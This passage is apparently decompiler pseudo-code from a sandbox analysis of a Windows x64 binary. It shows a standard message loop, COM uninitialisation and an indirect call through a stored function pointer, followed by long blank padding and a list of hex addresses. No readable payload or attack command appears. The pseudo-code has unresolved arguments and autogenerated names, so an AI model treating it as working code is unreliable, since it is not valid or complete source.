                                                                                                      				LoadStringW(??, ??, ??, ??);
                                                                                                      				E00007FF87FF87C113ED0(_a8);
                                                                                                      				if (E00007FF87FF87C113CB0(_a16, _a8) != 0) goto 0x7c11932d;
                                                                                                      				__imp__CoUninitialize();
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r9d = 0;
                                                                                                      				r8d = 0;
                                                                                                      				if (GetMessageW(??, ??, ??, ??) == 0) goto 0x7c119372;
                                                                                                      				if (TranslateAcceleratorW(??, ??, ??) != 0) goto 0x7c119370;
                                                                                                      				TranslateMessage(??);
                                                                                                      				DispatchMessageW(??);
                                                                                                      				goto 0x7c11932d;
                                                                                                      				__imp__CoUninitialize();
                                                                                                      				goto 0x7c1193ea;
                                                                                                      				r8d = 0x20;
                                                                                                      				E00007FF87FF87C106920(0, 0, _t2703, __esp, 0x7c17fdc0, 0x7c17a060, _t2746,  &_v2752);
                                                                                                      				_t2716 = _a8;
                                                                                                      				 *0x7c17fdc0 = _t2716;
                                                                                                      				 *0x7c17fdc8 = 1;
                                                                                                      				E00007FF87FF87C119510(_v2800, _v2776, 0x7c17a060); // executed
                                                                                                      				 *0x7c17fdd0 = _t2716;
                                                                                                      				E00007FF87FF87C119510(_v2796,  &_v2632, 0x7c17a060); // executed
                                                                                                      				_v2768 = _t2716;
                                                                                                      				_v2768();
                                                                                                      				return E00007FF87FF87C103A70(1, 0, _v2796, _v24 ^ _t2748);
                                                                                                      			}



































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































































                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb0
                                                                                                      0x7ff87c113fb5
                                                                                                      0x7ff87c113fb9
                                                                                                      0x7ff87c113fc5
                                                                                                      0x7ff87c113fcc
                                                                                                      0x7ff87c113fcf
                                                                                                      0x7ff87c113fde
                                                                                                      0x7ff87c113fe7
                                                                                                      0x7ff87c113fe9
                                                                                                      0x7ff87c113fee
                                                                                                      0x7ff87c113ff6
                                                                                                      0x7ff87c113ffe
                                                                                                      0x7ff87c114007
                                                                                                      0x7ff87c114015
                                                                                                      0x7ff87c11401a
                                                                                                      0x7ff87c114025
                                                                                                      0x7ff87c114027
                                                                                                      0x7ff87c114034
                                                                                                      0x7ff87c11403e
                                                                                                      0x7ff87c114043
                                                                                                      0x7ff87c11404d
                                                                                                      0x7ff87c114057
                                                                                                      0x7ff87c114061
                                                                                                      0x7ff87c11406b
                                                                                                      0x7ff87c114075
                                                                                                      0x7ff87c11407f
                                                                                                      0x7ff87c114087
                                                                                                      0x7ff87c11408f
                                                                                                      0x7ff87c114097
                                                                                                      0x7ff87c11409f
                                                                                                      0x7ff87c1140a7
                                                                                                      0x7ff87c1140af
                                                                                                      0x7ff87c1140b7
                                                                                                      0x7ff87c1140bf
                                                                                                      0x7ff87c1140c7
                                                                                                      0x7ff87c1140cf
                                                                                                      0x7ff87c1140d7
                                                                                                      0x7ff87c1140df
                                                                                                      0x7ff87c1140e7
                                                                                                      0x7ff87c1140ef
                                                                                                      0x7ff87c1140f7
                                                                                                      0x7ff87c1140ff
                                                                                                      0x7ff87c114107
                                                                                                      0x7ff87c11410f
                                                                                                      0x7ff87c114117
                                                                                                      0x7ff87c11411f
                                                                                                      0x7ff87c114127
                                                                                                      0x7ff87c11412f
                                                                                                      0x7ff87c114137
                                                                                                      0x7ff87c11413f
                                                                                                      0x7ff87c114147
                                                                                                      0x7ff87c11414f
                                                                                                      0x7ff87c114157
                                                                                                      0x7ff87c11415f
                                                                                                      0x7ff87c114167
                                                                                                      0x7ff87c11416f
                                                                                                      0x7ff87c114177
                                                                                                      0x7ff87c11417f
                                                                                                      0x7ff87c114187
                                                                                                      0x7ff87c11418f
                                                                                                      0x7ff87c114197
                                                                                                      0x7ff87c11419f
                                                                                                      0x7ff87c1141a7
                                                                                                      0x7ff87c1141af
                                                                                                      0x7ff87c1141b7
                                                                                                      0x7ff87c1141bf
                                                                                                      0x7ff87c1141c7
                                                                                                      0x7ff87c1141cf
                                                                                                      0x7ff87c1141d7
                                                                                                      0x7ff87c1141df
                                                                                                      0x7ff87c1141e7
                                                                                                      0x7ff87c1141ef
                                                                                                      0x7ff87c1141f7
                                                                                                      0x7ff87c1141ff
                                                                                                      0x7ff87c114207
                                                                                                      0x7ff87c11420f
                                                                                                      0x7ff87c114217
                                                                                                      0x7ff87c11421f
                                                                                                      0x7ff87c114227
                                                                                                      0x7ff87c11422f
                                                                                                      0x7ff87c114237
                                                                                                      0x7ff87c11423f
                                                                                                      0x7ff87c114247
                                                                                                      0x7ff87c11424f
                                                                                                      0x7ff87c114257
                                                                                                      0x7ff87c11425f
                                                                                                      0x7ff87c114267
                                                                                                      0x7ff87c11426f
                                                                                                      0x7ff87c114277
                                                                                                      0x7ff87c11427f
                                                                                                      0x7ff87c114287
                                                                                                      0x7ff87c11428f
                                                                                                      0x7ff87c114297
                                                                                                      0x7ff87c11429f
                                                                                                      0x7ff87c1142a7
                                                                                                      0x7ff87c1142af
                                                                                                      0x7ff87c1142b7
                                                                                                      0x7ff87c1142bf
                                                                                                      0x7ff87c1142c7
                                                                                                      0x7ff87c1142cf
                                                                                                      0x7ff87c1142d7
                                                                                                      0x7ff87c1142df
                                                                                                      0x7ff87c1142e7
                                                                                                      0x7ff87c1142ef
                                                                                                      0x7ff87c1142f7
                                                                                                      0x7ff87c1142ff
                                                                                                      0x7ff87c114307
                                                                                                      0x7ff87c11430f
                                                                                                      0x7ff87c114317
                                                                                                      0x7ff87c11431f
                                                                                                      0x7ff87c114327
                                                                                                      0x7ff87c11432f
                                                                                                      0x7ff87c114337
                                                                                                      0x7ff87c11433f
                                                                                                      0x7ff87c114347
                                                                                                      0x7ff87c11434f
                                                                                                      0x7ff87c114357
                                                                                                      0x7ff87c11435f
                                                                                                      0x7ff87c114367
                                                                                                      0x7ff87c11436f
                                                                                                      0x7ff87c114377
                                                                                                      0x7ff87c11437f
                                                                                                      0x7ff87c114387
                                                                                                      0x7ff87c11438f
                                                                                                      0x7ff87c114397
                                                                                                      0x7ff87c11439f
                                                                                                      0x7ff87c1143a7
                                                                                                      0x7ff87c1143af
                                                                                                      0x7ff87c1143b7
                                                                                                      0x7ff87c1143bf
                                                                                                      0x7ff87c1143c7
                                                                                                      0x7ff87c1143cf
                                                                                                      0x7ff87c1143d7
                                                                                                      0x7ff87c1143df
                                                                                                      0x7ff87c1143e7
                                                                                                      0x7ff87c1143ef
                                                                                                      0x7ff87c1143f7
                                                                                                      0x7ff87c1143ff
                                                                                                      0x7ff87c114407
                                                                                                      0x7ff87c11440f
                                                                                                      0x7ff87c114417
                                                                                                      0x7ff87c11441f
                                                                                                      0x7ff87c114427
                                                                                                      0x7ff87c11442f
                                                                                                      0x7ff87c114437
                                                                                                      0x7ff87c11443f
                                                                                                      0x7ff87c114447
                                                                                                      0x7ff87c11444f
                                                                                                      0x7ff87c114457
                                                                                                      0x7ff87c11445f
                                                                                                      0x7ff87c114467
                                                                                                      0x7ff87c11446f
                                                                                                      0x7ff87c114477
                                                                                                      0x7ff87c11447f
                                                                                                      0x7ff87c114487
                                                                                                      0x7ff87c11448f
                                                                                                      0x7ff87c114497
                                                                                                      0x7ff87c11449f
                                                                                                      0x7ff87c1144a7
                                                                                                      0x7ff87c1144af
                                                                                                      0x7ff87c1144b7
                                                                                                      0x7ff87c1144bf
                                                                                                      0x7ff87c1144c7
                                                                                                      0x7ff87c1144cf
                                                                                                      0x7ff87c1144d7
                                                                                                      0x7ff87c1144df
                                                                                                      0x7ff87c1144e7
                                                                                                      0x7ff87c1144ef
                                                                                                      0x7ff87c1144f7
                                                                                                      0x7ff87c1144ff
                                                                                                      0x7ff87c114507
                                                                                                      0x7ff87c11450f
                                                                                                      0x7ff87c114517
                                                                                                      0x7ff87c11451f
                                                                                                      0x7ff87c114527
                                                                                                      0x7ff87c11452f
                                                                                                      0x7ff87c114537
                                                                                                      0x7ff87c11453f
                                                                                                      0x7ff87c114547
                                                                                                      0x7ff87c11454f
                                                                                                      0x7ff87c114557
                                                                                                      0x7ff87c11455f
                                                                                                      0x7ff87c114567
                                                                                                      0x7ff87c11456f
                                                                                                      0x7ff87c114577
                                                                                                      0x7ff87c11457f
                                                                                                      0x7ff87c114587
                                                                                                      0x7ff87c11458f
                                                                                                      0x7ff87c114597
                                                                                                      0x7ff87c11459f
                                                                                                      0x7ff87c1145a7
                                                                                                      0x7ff87c1145af
                                                                                                      0x7ff87c1145b7
                                                                                                      0x7ff87c1145bf
                                                                                                      0x7ff87c1145c7
                                                                                                      0x7ff87c1145cf
                                                                                                      0x7ff87c1145d7
                                                                                                      0x7ff87c1145df
                                                                                                      0x7ff87c1145e7
                                                                                                      0x7ff87c1145ef
                                                                                                      0x7ff87c1145f7
                                                                                                      0x7ff87c1145ff
                                                                                                      0x7ff87c114607
                                                                                                      0x7ff87c11460f
                                                                                                      0x7ff87c114617
                                                                                                      0x7ff87c11461f
                                                                                                      0x7ff87c114627
                                                                                                      0x7ff87c11462f
                                                                                                      0x7ff87c114637
                                                                                                      0x7ff87c11463f
                                                                                                      0x7ff87c114647
                                                                                                      0x7ff87c11464f
                                                                                                      0x7ff87c114657
                                                                                                      0x7ff87c11465f
                                                                                                      0x7ff87c114667
                                                                                                      0x7ff87c11466f
                                                                                                      0x7ff87c114677
                                                                                                      0x7ff87c11467f
                                                                                                      0x7ff87c114687
                                                                                                      0x7ff87c11468f
                                                                                                      0x7ff87c114697
                                                                                                      0x7ff87c11469f
                                                                                                      0x7ff87c1146a7
                                                                                                      0x7ff87c1146af
                                                                                                      0x7ff87c1146b7
                                                                                                      0x7ff87c1146bf
                                                                                                      0x7ff87c1146c7
                                                                                                      0x7ff87c1146cf
                                                                                                      0x7ff87c1146d7
                                                                                                      0x7ff87c1146df
                                                                                                      0x7ff87c1146e7
                                                                                                      0x7ff87c1146ef
                                                                                                      0x7ff87c1146f7
                                                                                                      0x7ff87c1146ff
                                                                                                      0x7ff87c114707
                                                                                                      0x7ff87c11470f
                                                                                                      0x7ff87c114717
                                                                                                      0x7ff87c11471f
                                                                                                      0x7ff87c114727
                                                                                                      0x7ff87c11472f
                                                                                                      0x7ff87c114737
                                                                                                      0x7ff87c11473f
                                                                                                      0x7ff87c114747
                                                                                                      0x7ff87c11474f
                                                                                                      0x7ff87c114757
                                                                                                      0x7ff87c11475f
                                                                                                      0x7ff87c114767
                                                                                                      0x7ff87c11476f
                                                                                                      0x7ff87c114777
                                                                                                      0x7ff87c11477f
                                                                                                      0x7ff87c114787
                                                                                                      0x7ff87c11478f
                                                                                                      0x7ff87c114797
                                                                                                      0x7ff87c11479f
                                                                                                      0x7ff87c1147a7
                                                                                                      0x7ff87c1147af
                                                                                                      0x7ff87c1147b7
                                                                                                      0x7ff87c1147bf
                                                                                                      0x7ff87c1147c7
                                                                                                      0x7ff87c1147cf
                                                                                                      0x7ff87c1147d7
                                                                                                      0x7ff87c1147df
                                                                                                      0x7ff87c1147e7
                                                                                                      0x7ff87c1147ef
                                                                                                      0x7ff87c1147f7
                                                                                                      0x7ff87c1147ff
                                                                                                      0x7ff87c114807
                                                                                                      0x7ff87c11480f
                                                                                                      0x7ff87c114817
                                                                                                      0x7ff87c11481f
                                                                                                      0x7ff87c114827
                                                                                                      0x7ff87c11482f
                                                                                                      0x7ff87c114837
                                                                                                      0x7ff87c11483f
                                                                                                      0x7ff87c114847
                                                                                                      0x7ff87c11484f
                                                                                                      0x7ff87c114857
                                                                                                      0x7ff87c11485f
                                                                                                      0x7ff87c114867
                                                                                                      0x7ff87c11486f
                                                                                                      0x7ff87c114877
                                                                                                      0x7ff87c11487f
                                                                                                      0x7ff87c114887
                                                                                                      0x7ff87c11488f
                                                                                                      0x7ff87c114897
                                                                                                      0x7ff87c11489f
                                                                                                      0x7ff87c1148a7
                                                                                                      0x7ff87c1148af
                                                                                                      0x7ff87c1148b7
                                                                                                      0x7ff87c1148bf
                                                                                                      0x7ff87c1148c7
                                                                                                      0x7ff87c1148cf
                                                                                                      0x7ff87c1148d7
                                                                                                      0x7ff87c1148df
                                                                                                      0x7ff87c1148e7
                                                                                                      0x7ff87c1148ef
                                                                                                      0x7ff87c1148f7
                                                                                                      0x7ff87c1148ff
                                                                                                      0x7ff87c114907
                                                                                                      0x7ff87c11490f
                                                                                                      0x7ff87c114917
                                                                                                      0x7ff87c11491f
                                                                                                      0x7ff87c114927
                                                                                                      0x7ff87c11492f
                                                                                                      0x7ff87c114937
                                                                                                      0x7ff87c11493f
                                                                                                      0x7ff87c114947
                                                                                                      0x7ff87c11494f
                                                                                                      0x7ff87c114957
                                                                                                      0x7ff87c11495f
                                                                                                      0x7ff87c114967
                                                                                                      0x7ff87c11496f
                                                                                                      0x7ff87c114977
                                                                                                      0x7ff87c11497f
                                                                                                      0x7ff87c114987
                                                                                                      0x7ff87c11498f
                                                                                                      0x7ff87c114997
                                                                                                      0x7ff87c11499f
                                                                                                      0x7ff87c1149a7
                                                                                                      0x7ff87c1149af
                                                                                                      0x7ff87c1149b7
                                                                                                      0x7ff87c1149bf
                                                                                                      0x7ff87c1149c7
                                                                                                      0x7ff87c1149cf
                                                                                                      0x7ff87c1149d7
                                                                                                      0x7ff87c1149df
                                                                                                      0x7ff87c1149e7
                                                                                                      0x7ff87c1149ef
                                                                                                      0x7ff87c1149f7
                                                                                                      0x7ff87c1149ff
                                                                                                      0x7ff87c114a07
                                                                                                      0x7ff87c114a0f
                                                                                                      0x7ff87c114a17
                                                                                                      0x7ff87c114a1f
                                                                                                      0x7ff87c114a27
                                                                                                      0x7ff87c114a2f
                                                                                                      0x7ff87c114a37
                                                                                                      0x7ff87c114a3f
                                                                                                      0x7ff87c114a47
                                                                                                      0x7ff87c114a4f
                                                                                                      0x7ff87c114a57
                                                                                                      0x7ff87c114a5f
                                                                                                      0x7ff87c114a67
                                                                                                      0x7ff87c114a6f
                                                                                                      0x7ff87c114a77
                                                                                                      0x7ff87c114a7f
                                                                                                      0x7ff87c114a87
                                                                                                      0x7ff87c114a8f
                                                                                                      0x7ff87c114a97
                                                                                                      0x7ff87c114a9f
                                                                                                      0x7ff87c114aa7
                                                                                                      0x7ff87c114aaf
                                                                                                      0x7ff87c114ab7
                                                                                                      0x7ff87c114abf
                                                                                                      0x7ff87c114ac7
                                                                                                      0x7ff87c114acf
                                                                                                      0x7ff87c114ad7
                                                                                                      0x7ff87c114adf
                                                                                                      0x7ff87c114ae7
                                                                                                      0x7ff87c114aef
                                                                                                      0x7ff87c114af7
                                                                                                      0x7ff87c114aff
                                                                                                      0x7ff87c114b07
                                                                                                      0x7ff87c114b0f
                                                                                                      0x7ff87c114b17
                                                                                                      0x7ff87c114b1f
                                                                                                      0x7ff87c114b27
                                                                                                      0x7ff87c114b2f
                                                                                                      0x7ff87c114b37
                                                                                                      0x7ff87c114b3f
                                                                                                      0x7ff87c114b47
                                                                                                      0x7ff87c114b4f
                                                                                                      0x7ff87c114b57
                                                                                                      0x7ff87c114b5f
                                                                                                      0x7ff87c114b67
                                                                                                      0x7ff87c114b6f
                                                                                                      0x7ff87c114b77
                                                                                                      0x7ff87c114b7f
                                                                                                      0x7ff87c114b87
                                                                                                      0x7ff87c114b8f
                                                                                                      0x7ff87c114b97
                                                                                                      0x7ff87c114b9f
                                                                                                      0x7ff87c114ba7
                                                                                                      0x7ff87c114baf
                                                                                                      0x7ff87c114bb7
                                                                                                      0x7ff87c114bbf
                                                                                                      0x7ff87c114bc7
                                                                                                      0x7ff87c114bcf
                                                                                                      0x7ff87c114bd7
                                                                                                      0x7ff87c114bdf
                                                                                                      0x7ff87c114be7
                                                                                                      0x7ff87c114bef
                                                                                                      0x7ff87c114bf7
                                                                                                      0x7ff87c114bff
                                                                                                      0x7ff87c114c07
                                                                                                      0x7ff87c114c0f
                                                                                                      0x7ff87c114c17
                                                                                                      0x7ff87c114c1f
                                                                                                      0x7ff87c114c27
                                                                                                      0x7ff87c114c2f
                                                                                                      0x7ff87c114c37
                                                                                                      0x7ff87c114c3f
                                                                                                      0x7ff87c114c47
                                                                                                      0x7ff87c114c4f
                                                                                                      0x7ff87c114c57
                                                                                                      0x7ff87c114c5f
                                                                                                      0x7ff87c114c67
                                                                                                      0x7ff87c114c6f
                                                                                                      0x7ff87c114c77
                                                                                                      0x7ff87c114c7f
                                                                                                      0x7ff87c114c87
                                                                                                      0x7ff87c114c8f
                                                                                                      0x7ff87c114c97
                                                                                                      0x7ff87c114c9f
                                                                                                      0x7ff87c114ca7
                                                                                                      0x7ff87c114caf
                                                                                                      0x7ff87c114cb7
                                                                                                      0x7ff87c114cbf
                                                                                                      0x7ff87c114cc7
                                                                                                      0x7ff87c114ccf
                                                                                                      0x7ff87c114cd7
                                                                                                      0x7ff87c114cdf
                                                                                                      0x7ff87c114ce7
                                                                                                      0x7ff87c114cef
                                                                                                      0x7ff87c114cf7
                                                                                                      0x7ff87c114cff
                                                                                                      0x7ff87c114d07
                                                                                                      0x7ff87c114d0f
                                                                                                      0x7ff87c114d17
                                                                                                      0x7ff87c114d1f
                                                                                                      0x7ff87c114d27
                                                                                                      0x7ff87c114d2f
                                                                                                      0x7ff87c114d37
                                                                                                      0x7ff87c114d3f
                                                                                                      0x7ff87c114d47
                                                                                                      0x7ff87c114d4f
                                                                                                      0x7ff87c114d57
                                                                                                      0x7ff87c114d5f
                                                                                                      0x7ff87c114d67
                                                                                                      0x7ff87c114d6f
                                                                                                      0x7ff87c114d77
                                                                                                      0x7ff87c114d7f
                                                                                                      0x7ff87c114d87
                                                                                                      0x7ff87c114d8f
                                                                                                      0x7ff87c114d97
                                                                                                      0x7ff87c114d9f
                                                                                                      0x7ff87c114da7
                                                                                                      0x7ff87c114daf
                                                                                                      0x7ff87c114db7
                                                                                                      0x7ff87c114dbf
                                                                                                      0x7ff87c114dc7
                                                                                                      0x7ff87c114dcf
                                                                                                      0x7ff87c114dd7
                                                                                                      0x7ff87c114ddf
                                                                                                      0x7ff87c114de7
                                                                                                      0x7ff87c114def
                                                                                                      0x7ff87c114df7
                                                                                                      0x7ff87c114dff
                                                                                                      0x7ff87c114e07
                                                                                                      0x7ff87c114e0f
                                                                                                      0x7ff87c114e17
                                                                                                      0x7ff87c114e1f
                                                                                                      0x7ff87c114e27
                                                                                                      0x7ff87c114e2f
                                                                                                      0x7ff87c114e37
                                                                                                      0x7ff87c114e3f
                                                                                                      0x7ff87c114e47
                                                                                                      0x7ff87c114e4f
                                                                                                      0x7ff87c114e57
                                                                                                      0x7ff87c114e5f
                                                                                                      0x7ff87c114e67
                                                                                                      0x7ff87c114e6f
                                                                                                      0x7ff87c114e77
                                                                                                      0x7ff87c114e7f
                                                                                                      0x7ff87c114e87
                                                                                                      0x7ff87c114e8f
                                                                                                      0x7ff87c114e97
                                                                                                      0x7ff87c114e9f
                                                                                                      0x7ff87c114ea7
                                                                                                      0x7ff87c114eaf
                                                                                                      0x7ff87c114eb7
                                                                                                      0x7ff87c114ebf
                                                                                                      0x7ff87c114ec7
                                                                                                      0x7ff87c114ecf
                                                                                                      0x7ff87c114ed7
                                                                                                      0x7ff87c114edf
                                                                                                      0x7ff87c114ee7
                                                                                                      0x7ff87c114eef
                                                                                                      0x7ff87c114ef7
                                                                                                      0x7ff87c114eff
                                                                                                      0x7ff87c114f07
                                                                                                      0x7ff87c114f0f
                                                                                                      0x7ff87c114f17
                                                                                                      0x7ff87c114f1f
                                                                                                      0x7ff87c114f27
                                                                                                      0x7ff87c114f2f
                                                                                                      0x7ff87c114f37
                                                                                                      0x7ff87c114f3f
                                                                                                      0x7ff87c114f47
                                                                                                      0x7ff87c114f4f
                                                                                                      0x7ff87c114f57
                                                                                                      0x7ff87c114f5f
                                                                                                      0x7ff87c114f67
                                                                                                      0x7ff87c114f6f
                                                                                                      0x7ff87c114f77
                                                                                                      0x7ff87c114f7f
                                                                                                      0x7ff87c114f87
                                                                                                      0x7ff87c114f8f
                                                                                                      0x7ff87c114f97
                                                                                                      0x7ff87c114f9f
                                                                                                      0x7ff87c114fa7
                                                                                                      0x7ff87c114faf
                                                                                                      0x7ff87c114fb7
                                                                                                      0x7ff87c114fbf
                                                                                                      0x7ff87c114fc7
                                                                                                      0x7ff87c114fcf
                                                                                                      0x7ff87c114fd7
                                                                                                      0x7ff87c114fdf
                                                                                                      0x7ff87c114fe7
                                                                                                      0x7ff87c114fef
                                                                                                      0x7ff87c114ff7
                                                                                                      0x7ff87c114fff
                                                                                                      0x7ff87c115007
                                                                                                      0x7ff87c11500f
                                                                                                      0x7ff87c115017
                                                                                                      0x7ff87c11501f
                                                                                                      0x7ff87c115027
                                                                                                      0x7ff87c11502f
                                                                                                      0x7ff87c115037
                                                                                                      0x7ff87c11503f
                                                                                                      0x7ff87c115047
                                                                                                      0x7ff87c11504f
                                                                                                      0x7ff87c115057
                                                                                                      0x7ff87c11505f
                                                                                                      0x7ff87c115067
                                                                                                      0x7ff87c11506f
                                                                                                      0x7ff87c115077
                                                                                                      0x7ff87c11507f
                                                                                                      0x7ff87c115087
                                                                                                      0x7ff87c11508f
                                                                                                      0x7ff87c115097
                                                                                                      0x7ff87c11509f
                                                                                                      0x7ff87c1150a7
                                                                                                      0x7ff87c1150af
                                                                                                      0x7ff87c1150b7
                                                                                                      0x7ff87c1150bf
                                                                                                      0x7ff87c1150c7
                                                                                                      0x7ff87c1150cf
                                                                                                      0x7ff87c1150d7
                                                                                                      0x7ff87c1150df
                                                                                                      0x7ff87c1150e7
                                                                                                      0x7ff87c1150ef
                                                                                                      0x7ff87c1150f7
                                                                                                      0x7ff87c1150ff
                                                                                                      0x7ff87c115107
                                                                                                      0x7ff87c11510f
                                                                                                      0x7ff87c115117
                                                                                                      0x7ff87c11511f
                                                                                                      0x7ff87c115127
                                                                                                      0x7ff87c11512f
                                                                                                      0x7ff87c115137
                                                                                                      0x7ff87c11513f
                                                                                                      0x7ff87c115147
                                                                                                      0x7ff87c11514f
                                                                                                      0x7ff87c115157
                                                                                                      0x7ff87c11515f
                                                                                                      0x7ff87c115167
                                                                                                      0x7ff87c11516f
                                                                                                      0x7ff87c115177
                                                                                                      0x7ff87c11517f
                                                                                                      0x7ff87c115187
                                                                                                      0x7ff87c11518f
                                                                                                      0x7ff87c115197
                                                                                                      0x7ff87c11519f
                                                                                                      0x7ff87c1151a7
                                                                                                      0x7ff87c1151af
                                                                                                      0x7ff87c1151b7
                                                                                                      0x7ff87c1151bf
                                                                                                      0x7ff87c1151c7
                                                                                                      0x7ff87c1151cf
                                                                                                      0x7ff87c1151d7
                                                                                                      0x7ff87c1151df
                                                                                                      0x7ff87c1151e7
                                                                                                      0x7ff87c1151ef
                                                                                                      0x7ff87c1151f7
                                                                                                      0x7ff87c1151ff
                                                                                                      0x7ff87c115207
                                                                                                      0x7ff87c11520f
                                                                                                      0x7ff87c115217
                                                                                                      0x7ff87c11521f
                                                                                                      0x7ff87c115227
                                                                                                      0x7ff87c11522f
                                                                                                      0x7ff87c115237
                                                                                                      0x7ff87c11523f
                                                                                                      0x7ff87c115247
                                                                                                      0x7ff87c11524f
                                                                                                      0x7ff87c115257
                                                                                                      0x7ff87c11525f
                                                                                                      0x7ff87c115267
                                                                                                      0x7ff87c11526f
                                                                                                      0x7ff87c115277
                                                                                                      0x7ff87c11527f
                                                                                                      0x7ff87c115287
                                                                                                      0x7ff87c11528f
                                                                                                      0x7ff87c115297
                                                                                                      0x7ff87c11529f
                                                                                                      0x7ff87c1152a7
                                                                                                      0x7ff87c1152af
                                                                                                      0x7ff87c1152b7
                                                                                                      0x7ff87c1152bf
                                                                                                      0x7ff87c1152c7
                                                                                                      0x7ff87c1152cf
                                                                                                      0x7ff87c1152d7
                                                                                                      0x7ff87c1152df
                                                                                                      0x7ff87c1152e7
                                                                                                      0x7ff87c1152ef
                                                                                                      0x7ff87c1152f7
                                                                                                      0x7ff87c1152ff
                                                                                                      0x7ff87c115307
                                                                                                      0x7ff87c11530f
                                                                                                      0x7ff87c115317
                                                                                                      0x7ff87c11531f
                                                                                                      0x7ff87c115327
                                                                                                      0x7ff87c11532f
                                                                                                      0x7ff87c115337
                                                                                                      0x7ff87c11533f
                                                                                                      0x7ff87c115347
                                                                                                      0x7ff87c11534f
                                                                                                      0x7ff87c115357
                                                                                                      0x7ff87c11535f
                                                                                                      0x7ff87c115367
                                                                                                      0x7ff87c11536f
                                                                                                      0x7ff87c115377
                                                                                                      0x7ff87c11537f
                                                                                                      0x7ff87c115387
                                                                                                      0x7ff87c11538f
                                                                                                      0x7ff87c115397
                                                                                                      0x7ff87c11539f
                                                                                                      0x7ff87c1153a7
                                                                                                      0x7ff87c1153af
                                                                                                      0x7ff87c1153b7
                                                                                                      0x7ff87c1153bf
                                                                                                      0x7ff87c1153c7
                                                                                                      0x7ff87c1153cf
                                                                                                      0x7ff87c1153d7
                                                                                                      0x7ff87c1153df
                                                                                                      0x7ff87c1153e7
                                                                                                      0x7ff87c1153ef
                                                                                                      0x7ff87c1153f7
                                                                                                      0x7ff87c1153ff
                                                                                                      0x7ff87c115407
                                                                                                      0x7ff87c11540f
                                                                                                      0x7ff87c115417
                                                                                                      0x7ff87c11541f
                                                                                                      0x7ff87c115427
                                                                                                      0x7ff87c11542f
                                                                                                      0x7ff87c115437
                                                                                                      0x7ff87c11543f
                                                                                                      0x7ff87c115447
                                                                                                      0x7ff87c11544f
                                                                                                      0x7ff87c115457
                                                                                                      0x7ff87c11545f
                                                                                                      0x7ff87c115467
                                                                                                      0x7ff87c11546f
                                                                                                      0x7ff87c115477
                                                                                                      0x7ff87c11547f
                                                                                                      0x7ff87c115487
                                                                                                      0x7ff87c11548f
                                                                                                      0x7ff87c115497
                                                                                                      0x7ff87c11549f
                                                                                                      0x7ff87c1154a7
                                                                                                      0x7ff87c1154af
                                                                                                      0x7ff87c1154b7
                                                                                                      0x7ff87c1154bf
                                                                                                      0x7ff87c1154c7
                                                                                                      0x7ff87c1154cf
                                                                                                      0x7ff87c1154d7
                                                                                                      0x7ff87c1154df
                                                                                                      0x7ff87c1154e7
                                                                                                      0x7ff87c1154ef
                                                                                                      0x7ff87c1154f7
                                                                                                      0x7ff87c1154ff
                                                                                                      0x7ff87c115507
                                                                                                      0x7ff87c11550f
                                                                                                      0x7ff87c115517
                                                                                                      0x7ff87c11551f
                                                                                                      0x7ff87c115527
                                                                                                      0x7ff87c11552f
                                                                                                      0x7ff87c115537
                                                                                                      0x7ff87c11553f
                                                                                                      0x7ff87c115547
                                                                                                      0x7ff87c11554f
                                                                                                      0x7ff87c115557
                                                                                                      0x7ff87c11555f
                                                                                                      0x7ff87c115567
                                                                                                      0x7ff87c11556f
                                                                                                      0x7ff87c115577
                                                                                                      0x7ff87c11557f
                                                                                                      0x7ff87c115587
                                                                                                      0x7ff87c11558f
                                                                                                      0x7ff87c115597
                                                                                                      0x7ff87c11559f
                                                                                                      0x7ff87c1155a7
                                                                                                      0x7ff87c1155af
                                                                                                      0x7ff87c1155b7
                                                                                                      0x7ff87c1155bf
                                                                                                      0x7ff87c1155c7
                                                                                                      0x7ff87c1155cf
                                                                                                      0x7ff87c1155d7
                                                                                                      0x7ff87c1155df
                                                                                                      0x7ff87c1155e7
                                                                                                      0x7ff87c1155ef
                                                                                                      0x7ff87c1155f7
                                                                                                      0x7ff87c1155ff
                                                                                                      0x7ff87c115607
                                                                                                      0x7ff87c11560f
                                                                                                      0x7ff87c115617
                                                                                                      0x7ff87c11561f
                                                                                                      0x7ff87c115627
                                                                                                      0x7ff87c11562f
                                                                                                      0x7ff87c115637
                                                                                                      0x7ff87c11563f
                                                                                                      0x7ff87c115647
                                                                                                      0x7ff87c11564f
                                                                                                      0x7ff87c115657
                                                                                                      0x7ff87c11565f
                                                                                                      0x7ff87c115667
                                                                                                      0x7ff87c11566f
                                                                                                      0x7ff87c115677
                                                                                                      0x7ff87c11567f
                                                                                                      0x7ff87c115687
                                                                                                      0x7ff87c11568f
                                                                                                      0x7ff87c115697
                                                                                                      0x7ff87c11569f
                                                                                                      0x7ff87c1156a7
                                                                                                      0x7ff87c1156af
                                                                                                      0x7ff87c1156b7
                                                                                                      0x7ff87c1156bf
                                                                                                      0x7ff87c1156c7
                                                                                                      0x7ff87c1156cf
                                                                                                      0x7ff87c1156d7
                                                                                                      0x7ff87c1156df
                                                                                                      0x7ff87c1156e7
                                                                                                      0x7ff87c1156ef
                                                                                                      0x7ff87c1156f7
                                                                                                      0x7ff87c1156ff
                                                                                                      0x7ff87c115707
                                                                                                      0x7ff87c11570f
                                                                                                      0x7ff87c115717
                                                                                                      0x7ff87c11571f
                                                                                                      0x7ff87c115727
                                                                                                      0x7ff87c11572f
                                                                                                      0x7ff87c115737
                                                                                                      0x7ff87c11573f
                                                                                                      0x7ff87c115747
                                                                                                      0x7ff87c11574f
                                                                                                      0x7ff87c115757
                                                                                                      0x7ff87c11575f
                                                                                                      0x7ff87c115767
                                                                                                      0x7ff87c11576f
                                                                                                      0x7ff87c115777
                                                                                                      0x7ff87c11577f
                                                                                                      0x7ff87c115787
                                                                                                      0x7ff87c11578f
                                                                                                      0x7ff87c115797
                                                                                                      0x7ff87c11579f
                                                                                                      0x7ff87c1157a7
                                                                                                      0x7ff87c1157af
                                                                                                      0x7ff87c1157b7
                                                                                                      0x7ff87c1157bf
                                                                                                      0x7ff87c1157c7
                                                                                                      0x7ff87c1157cf
                                                                                                      0x7ff87c1157d7
                                                                                                      0x7ff87c1157df
                                                                                                      0x7ff87c1157e7
                                                                                                      0x7ff87c1157ef
                                                                                                      0x7ff87c1157f7
                                                                                                      0x7ff87c1157ff
                                                                                                      0x7ff87c115807
